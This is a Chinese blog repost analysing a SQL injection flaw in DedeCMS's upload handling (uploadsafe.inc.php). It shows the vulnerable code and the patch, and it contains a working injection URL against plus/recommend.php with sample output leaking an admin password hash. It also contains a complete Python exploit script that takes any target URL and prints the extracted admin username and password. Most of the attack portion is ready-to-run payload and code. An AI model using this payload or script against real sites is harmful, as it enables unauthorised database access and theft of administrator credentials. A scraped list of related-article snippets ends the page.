2. 程式人生 > >[分析]-DedeCMS全版本通殺SQL注入漏洞

[分析]-DedeCMS全版本通殺SQL注入漏洞

阿新 發佈:2019-01-10

[利用]: http://p2j.cn/?p=798
[補丁]: http://www.dedecms.com/pl/#u20140228_5

---------------------------------------------------------------------------------------------------------------------

網路上公佈的原始poc格式如下:

http://127.0.0.1/dedecms5.7/plus/recommend.php?&aid=1&_FILES[type][tmp_name]=\%27%20%20or%[email protected]

%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%[email protected]__admin%60%20limit+0,1%29,5,6,7,8,9%[email protected]%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=111

注入成功,等效於執行下面程式碼:

mysql> SELECT s.*,t.* FROM 
    -> `dede_member_stow` AS s LEFT JOIN 
    -> `dede_member_stowtype` AS t ON s.type=t.stowname 
    -> WHERE s.aid='1' 
    -> AND s.type='\\' or 
 
[email protected]`\\'` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd) from `dede_admin` limit 0,1),5,6,7,8,9#@`\\'` ';
    -> ;
+----+-----+-----+-----------------------------+---------+------+----------+-----------+----------+
| id | mid | aid | title                       | addtime | type | stowname | indexname | indexurl |
+----+-----+-----+-----------------------------+---------+------+----------+-----------+----------+
|  1 |   2 |   3 | |admin|f297a57a5a743894a0e4 |       5 | 6    | 7        | 8         | 9        |
+----+-----+-----+-----------------------------+---------+------+----------+-----------+----------+
1 row in set (0.01 sec)

/*!50000union*/  表示若mysql版本高於5.0.0,則執行union操作.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

下面分析以引起問題的原始碼,./include/uploadsafe.inc.php

<?php

if(!defined('DEDEINC')) exit('Request Error!');
if(isset($_FILES['GLOBALS'])) exit('Request not allow!');


//為了防止使用者通過注入的可能性改動了資料庫
//這裡強制限定的某些檔案型別禁止上傳

$cfg_not_allowall = "php|pl|cgi|asp|aspx|jsp|php3|shtm|shtml";
$keyarr = array('name', 'type', 'tmp_name', 'size');

if ($GLOBALS['cfg_html_editor']=='ckeditor' && isset($_FILES['upload']))
{
    $_FILES['imgfile'] = $_FILES['upload'];
    $CKUpload = TRUE;
    unset($_FILES['upload']);
}

foreach($_FILES as $_key=>$_value)
{
    foreach($keyarr as $k)
    {
        if(!isset($_FILES[$_key][$k]))
        {
            exit('Request Error!');
        }
    }

    if( preg_match('#^(cfg_|GLOBALS)#', $_key) )
    {
        exit('Request var not allow for uploadsafe!');
    }

    // DedeCMS全版本通殺SQL注入 
    $$_key = $_FILES[$_key]['tmp_name'] = str_replace("\\\\", "\\", $_FILES[$_key]['tmp_name']);
    // ----- 修復後, 如下: -----
    // $$_key = $_FILES[$_key]['tmp_name'];
    ${$_key.'_name'} = $_FILES[$_key]['name'];
    ${$_key.'_type'} = $_FILES[$_key]['type'] = preg_replace('#[^0-9a-z\./]#i', '', $_FILES[$_key]['type']);
    ${$_key.'_size'} = $_FILES[$_key]['size'] = preg_replace('#[^0-9]#','',$_FILES[$_key]['size']);
    if(!empty(${$_key.'_name'}) && (preg_match("#\.(".$cfg_not_allowall.")$#i",${$_key.'_name'}) || !preg_match("#\.#", ${$_key.'_name'})) )
    {
        if(!defined('DEDEADMIN'))
        {
            exit('Not Admin Upload filetype not allow !');
        }
    }

    if(empty(${$_key.'_size'}))
    {
        ${$_key.'_size'} = @filesize($$_key);
    }


    $imtypes = array
    (
        "image/pjpeg", "image/jpeg", "image/gif", "image/png", 
        "image/xpng", "image/wbmp", "image/bmp"
    );


    if(in_array(strtolower(trim(${$_key.'_type'})), $imtypes))
    {
        $image_dd = @getimagesize($$_key);
        if (!is_array($image_dd))
        {
            exit('Upload filetype not allow !');
        }
    }
}

?>

$$_key = $_FILES[$_key]['tmp_name'] = str_replace("\\\\", "\\", $_FILES[$_key]['tmp_name']); 配合./include/common.inc.php引發問題,  
//轉換上傳的檔案相關的變數及安全處理、並引用前臺通用的上傳函式
if($_FILES)
{
    require_once(DEDEINC.'/uploadsafe.inc.php');
}
common.inc.php 定義函式_RunMagicQuotes ,foreach(Array('_GET','_POST','_COOKIE') as $_request) 處_RunMagicQuotes被呼叫,如下所示
function _RunMagicQuotes(&$svar)
{
    if(!get_magic_quotes_gpc())
    {
        if( is_array($svar) )
        {
            foreach($svar as $_k => $_v) $svar[$_k] = _RunMagicQuotes($_v);
        }
        else
        {
            if( strlen($svar)>0 && preg_match('#^(cfg_|GLOBALS|_GET|_POST|_COOKIE)#',$svar) )
            {
              exit('Request var not allow!');
            }
            $svar = addslashes($svar);
        }
    }
    return $svar;
}


if (!defined('DEDEREQUEST')) 
{
    //檢查和註冊外部提交的變數   (2011.8.10 修改登入時相關過濾)
    function CheckRequest(&$val) {
        if (is_array($val)) {
            foreach ($val as $_k=>$_v) {
                if($_k == 'nvarname') continue;
                CheckRequest($_k); 
                CheckRequest($val[$_k]);
            }
        } else
        {
            if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS|_GET|_POST|_COOKIE)#',$val)  )
            {
                exit('Request var not allow!');
            }
        }
    }
    

    //var_dump($_REQUEST);exit;
    CheckRequest($_REQUEST);
	CheckRequest($_COOKIE);


    foreach(Array('_GET','_POST','_COOKIE') as $_request)
    {
        foreach($$_request as $_k => $_v) 
		{
			if($_k == 'nvarname') ${$_k} = $_v;
			else ${$_k} = _RunMagicQuotes($_v);
		}
    }
}

$_GET, $_POST,$_COOKIE 傳入的資料會被 _RunMagicQuotes 檢查,_RunMagicQuotes 檢查時, 未處理$_FILES,傳入帶引號的資料 ,引發注入問題. 
$$_key = $_FILES[$_key]['tmp_name'] = str_replace("\\\\", "\\", $_FILES[$_key]['tmp_name']);
// ----- 修復後, 如下: -----
// $$_key = $_FILES[$_key]['tmp_name'];
${$_key.'_name'} = $_FILES[$_key]['name'];
${$_key.'_type'} = $_FILES[$_key]['type'] = preg_replace('#[^0-9a-z\./]#i', '', $_FILES[$_key]['type']);
${$_key.'_size'} = $_FILES[$_key]['size'] = preg_replace('#[^0-9]#','',$_FILES[$_key]['size']);

需要傳入的引數有_FILES[type]['tmpname'], _FILES[type]['name'], _FILES[type]['type'], _FILES[type]['size'], 構造完成後,如上所示.


+++++++++++++++++++++++++++++++++++++++++++++++++++++

python - POC 利用程式如下:

#!/usr/bin/env python

import urllib2
import re
import sys

def banner():

    print >>sys.stderr,'\n++++++++++++++++++++++++++++++++++++++++++++++++++++++'
    print >>sys.stderr,'[POC]  : DedeCMS 5.7 /plus/recommend.php SQL Injection'
    print >>sys.stderr,'[URL]  : http://sebug.net/vuldb/ssvid-61660'
    print >>sys.stderr,'[patch]: http://www.dedecms.com/pl/#u20140228_5'
    print >>sys.stderr,'[Usage]: %s http://path/to/dederoot/' % sys.argv[0]
    print >>sys.stderr,'++++++++++++++++++++++++++++++++++++++++++++++++++++++'

def sqli_exp(url):

        poc = [
    "/plus/recommend.php?",
    "&aid=1",
    "&_FILES[type][tmp_name]=",
    "\%27%20%20or%[email protected]%60\%27%60%20",
    "/*!50000union*//*!50000select*/1,2,3,%28select%20%20CONCAT%280x7c,userid,0x7c,pwd,0x7c%29+from+%60%[email protected]__admin%60%20limit+0,1",
    "%29,5,6,7,8,9%[email protected]%60\%27%60+",
    "&_FILES[type][name]=1.jpg",
    "&_FILES[type][type]=application/octet-stream",
    "&_FILES[type][size]=111"
    ]
    url += "".join(poc)
    req = urllib2.urlopen(url,data=None, timeout=7)
    response = req.read()
    matches = re.search(r'<h2>\xe6\x8e\xa8\xe8\x8d\x90\xef\xbc\x9a|(.*)</h2>', response, re.M|re.I)    
    if ("SRE_Match" in str(type(matches))):
        data = matches.group().split('|')
        user = data[1]
        pwd  = data[2]
        print "user: %s \npass: %s \n" % (user, pwd)

if __name__ == '__main__':

    banner()

    if len(sys.argv) == 2:
        print >>sys.stderr,"[+] exploit - %s" % sys.argv[1] 
        sqli_exp(sys.argv[1])


+++++++++++++++++++++++++++++++++++++++++++++++++++++

http://loudong.360.cn/blog/view/id/17
http://www.freebuf.com/tools/27206.html

相關推薦

[分析]-DedeCMS版本SQL注入漏洞

[利用]: http://p2j.cn/?p=798 [補丁]: http://www.dedecms.com/pl/#u20140228_5 -----------------------------------------------------------------

CVE-2017-11882 POC 版本

技術 ref com blog bsp mbed alt https hub POC https://github.com/embedi/CVE-2017-11882 CVE-2017-11882 POC 全版本通殺

ecshop 系列版本網站漏洞 遠端程式碼執行sql注入漏洞

ecshop漏洞於2018年9月12日被某安全組織披露爆出,該漏洞受影響範圍較廣,ecshop2.73版本以及目前最新的3.0、3.6、4.0版本都受此次ecshop漏洞的影響,主要漏洞是利用遠端程式碼執行sql注入語句漏洞,導致可以插入sql查詢程式碼以及寫入程式碼到網站伺

齊博CMS1.0版本sql注入漏洞

詳見:http://dingody.iteye.com/blog/2195864這裡只說一下最後的利用,還是使用原作者指出的那個注入點,雖然value值儲存在了兩個sql語句裡面,這兩個語句的列不一樣,如果利用第二個語句,會在第一個語句的時候報列不一致的錯誤;嘗試利用第一個語

ThinkPHP 5.1.x SQL注入漏洞分析

一、背景引見 ThinkPHP 是一個疾速、複雜的基於 MVC 和麵向物件的輕量級 PHP 開發框架,遵照 Apache2 開源協議釋出。ThinkPHP從降生以來不斷秉承簡潔適用的設計準繩,在堅持出色的功能和至簡的程式碼的同時,也注重開發體驗和易用性,為 WEB 使用和 API 開發提供了強無

【程式碼審計】五指CMS_v4.1.0 copyfrom.php 頁面存在SQL注入漏洞分析

  0x00 環境準備 五指CMS官網:https://www.wuzhicms.com/ 網站原始碼版本:五指CMS v4.1.0 UTF-8 開源版 程式原始碼下載:https://www.wuzhicms.com/download/ 測試網站首頁:   0x01 程式碼

【程式碼審計】五指CMS_v4.1.0 後臺存在SQL注入漏洞分析

  0x00 環境準備 五指CMS官網:https://www.wuzhicms.com/ 網站原始碼版本:五指CMS v4.1.0 UTF-8 開源版 程式原始碼下載:https://www.wuzhicms.com/download/ 測試網站首頁:   0x01 程式碼

【程式碼審計】大米CMS_V5.5.3 SQL注入漏洞分析

  0x00 環境準備 大米CMS官網:http://www.damicms.com 網站原始碼版本:大米CMS_V5.5.3試用版(更新時間:2017-04-15) 程式原始碼下載:http://www.damicms.com/downes/dami.rar 測試網站首頁:  

Vtiger CRM 幾處SQL注入漏洞分析,測試工程師可借鑑

本文由雲+社群發表 0x00 前言 乾白盒審計有小半年了,大部分是業務上的程式碼,邏輯的複雜度和功能模組結構都比較簡單,幹久了收獲也就一般,有機會接觸一個成熟的產品(vtiger CRM)進行白盒審計,從審計的技術難度上來說,都比公司內的那些業務複雜得多,而真正要提高自己技術水平,更應該看的也是

ThinkCMF X2.2.2多處SQL注入漏洞分析

   1.     漏洞描述 ThinkCMF是一款基於ThinkPHP+MySQL開發的中文內容管理框架,其中X系列基於ThinkPHP 3.2.3開發,最後更新到2.2.2版本。最近剛好在滲透測試專案中遇到這個CMS,便審了下原始碼發現多處S

齊博CMS變數覆蓋導致sql注入漏洞分析

齊博CMS變數覆蓋導致sql注入漏洞分析 1. 根據阿里文章會員中心評論管理member/comment.php中存在變數cidDB未初始化,所以從此處開始利用對評論批量刪除,抓包檢視 2.exp利用全域性變數$_FILES的註冊變數控制不嚴,所以需要在request

SQL注入漏洞接觸--入門篇

 隨著B/S模式應用開發的發展,使用這種模式編寫應用程式的程式設計師也越來越多。但是由於這個行業的入門門檻不高,程式設計師的水平及經驗也參差不齊,相當大一部分程式設計師在編寫程式碼的時候,沒有對使用者輸入資料的合法性進行判斷,使應用程式存在安全隱患。使用者可以提交一段資料庫查

SQL注入漏洞接觸 入門篇 [1]

引  言 隨著B/S模式應用開發的發展,使用這種模式編寫應用程式的程式設計師也越來越多。但是由於這個行業的入門門檻不高,程式設計師的水平及經驗也參差不齊,相當大一部分程式設計師在編寫程式碼的時候,沒有對使用者輸入資料的合法性進行判斷,使應用程式存在安全隱患。使用者可以提交一段

SQL注入漏洞,攻防必技!

SQL注入是常見的利用程式漏洞進行攻擊的方法,是很多入門級“黑客”喜歡採用的攻擊方式,近來網上對它的討論很熱烈,所以我在本期專題中為讀者揭示SQL攻擊的主要原理以及如何防範這種攻擊。攻擊源於程式漏洞 SQL注入原理導致SQL注入攻擊的漏洞並非系統造成的,主要是程

SQL注入漏洞接觸——進階篇

接下來,我們就繼續學習如何從資料庫中獲取想要獲得的內容,首先,我們先看看SQL注入的一般步驟:  一、SQL注入的一般步驟  首先,判斷環境,尋找注入點,判斷資料庫型別,這在入門篇已經講過了。  其次,根據注入引數型別,在腦海中重構SQL語句的原貌,按引數型別主要分為下面

【轉】SQL注入漏洞接觸--入門篇

隨著B/S模式應用開發的發展,使用這種模式編寫應用程式的程式設計師也越來越多。但是由於這個行業的入門門檻不高,程式設計師的水平及經驗也參差不齊,相當大一部分程式設計師在編寫程式碼的時候,沒有對使用者輸入資料的合法性進行判斷,使應用程式存在安全隱患。使用者可以提交一段資料庫

SQL注入漏洞接觸--入門篇 [1]

引  言 隨著B/S模式應用開發的發展,使用這種模式編寫應用程式的程式設計師也越來越 多。但是由於這個行業的入門門檻不高,程式設計師的水平及經驗也參差不齊,相當大一部分程式設計師在編寫程式碼的時候,沒有對使用者輸入資料的合法性進行判斷,使應用 程式存在安全隱患。使用者可以提交

ThinkPHP 3.1中的SQL注入漏洞分析----論ThinkPHP 3.1中的半吊子的PDO封裝

我總結ThinkPHP的PDO封裝可以用買櫝還珠來下結論,表面上封裝了PDO支援,但實際卻並沒有使用到PDO的精髓部分,這不是買櫝還珠是什麼呢? 花了一些時間瞭解到ThinkPHP 3.1框架,其官方網站上對其描述得相當不錯,但隨著我閱讀其程式碼,事實並不是想象的那

SQL注入漏洞接觸——入門篇

隨著B/S模式應用開發的發展,使用這種模式編寫應用程式的程式設計師也越來越多。但是由於這個行業的入門門檻不高,程式設計師的水平及經驗也參差不齊,相當大一部分程式設計師在編寫程式碼的時候,沒有對使用者輸入資料的合法性進行判斷,使應用程式存在安全隱患。使用者可以提交一段資料庫查詢

SQL注入漏洞接觸--進階篇

第一節、SQL注入的一般步驟 首先,判斷環境,尋找注入點,判斷資料庫型別,這在入門篇已經講過了。 其次,根據注入引數型別,在腦海中重構SQL語句的原貌,按引數型別主要分為下面三種: (A) ID=49 這類注入的引數是數字型,SQL語句原貌大致如下:Select * from